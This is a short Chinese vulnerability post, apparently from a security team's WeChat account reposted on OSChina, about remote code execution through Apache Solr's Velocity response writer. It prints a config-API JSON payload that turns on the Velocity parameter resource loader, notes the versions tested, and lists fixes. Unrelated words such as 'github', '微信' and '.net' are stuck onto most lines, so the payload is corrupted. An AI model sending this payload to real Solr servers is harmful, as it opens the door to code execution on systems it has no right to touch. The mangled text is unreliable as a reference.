00x01 漏洞背景git
修改coregithub
{安全
"update-queryresponsewriter": {服務器
"startup": "lazy",微信
"name": "velocity",app
"class": "solr.VelocityResponseWriter",搜索引擎
"template.base.dir": "",spa
"solr.resource.loader.enabled": "true",.net
"params.resource.loader.enabled": "true"orm
}
}
已測7.0.1,7.7.2,8.1.1
一、升級Solr版本;
二、對Solr後臺進行身份認證,禁止未受權訪問。
手握日月摘星辰,安全路上永不止步。
- Khan攻防安全實驗室
本文分享自微信公衆號 - Khan安全團隊(KhanCJSH)。
若有侵權,請聯繫 support@oschina.cn 刪除。
本文參與「OSC源創計劃」,歡迎正在閱讀的你也加入,一塊兒分享。